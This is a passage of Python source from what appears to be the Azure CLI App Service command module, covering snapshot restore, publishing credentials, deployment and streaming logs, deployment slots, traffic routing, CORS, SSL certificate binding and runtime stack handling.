ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
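# Illustrative: _parse_frequency(cmd, '7d') returns (7, FrequencyUnit.day) and '12h' returns
# (12, FrequencyUnit.hour); any other suffix or a non-numeric prefix raises CLIError.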
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
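# Illustrative: for publishing user 'deployer' and app 'mysite', _get_local_git_url typically
# resolves to something like 'https://deployer@mysite.scm.azurewebsites.net/mysite.git'.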
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
        level = application_logging != 'off'
        if application_logging in ['filesystem', 'off']:
            fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: az blob storage log config is currently not in use; it will be implemented later.
        # Tracked as Issue: #4764 on GitHub
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
            # 100 MB max log size and 3-day retention; these values are hard-coded, as the portal does
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
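# Illustrative: with a default host name of 'mysite.azurewebsites.net', a distribution entry 'staging=25'
# makes set_traffic_routing create a RampUpRule that reroutes 25% of traffic to 'mysite-staging.azurewebsites.net'.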
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode() and decode() for a stdout encoding that does not support 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
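# Illustrative CLI usage for bind_ssl_cert above (placeholder values; assumes the standard
# 'az webapp config ssl bind' command surface):
#   az webapp config ssl bind -g MyResourceGroup -n MyWebApp \
#       --certificate-thumbprint <thumbprint> --ssl-type SNI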
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
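# Worked example for _match_host_names_from_cert above (illustrative hostnames):
#   _match_host_names_from_cert(['*.contoso.com'], ['www.contoso.com', 'api.contoso.com', 'contoso.com'])
#   returns {'www.contoso.com', 'api.contoso.com'}; the apex 'contoso.com' is skipped because its
#   suffix after the first '.' ('.com') does not equal the wildcard suffix ('.contoso.com').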
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
runtime = re.split('[| :]', runtime) # delimiters allowed: '|', ' ', ':'
return '|'.join(filter(None, runtime))
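    # Worked examples for remove_delimiters above (illustrative runtime strings):
    #   remove_delimiters('node 12.9')  -> 'node|12.9'
    #   remove_delimiters('php:7.4')    -> 'php|7.4'
    #   remove_delimiters('node|10.14') -> 'node|10.14'  (already delimited, returned unchanged)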
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
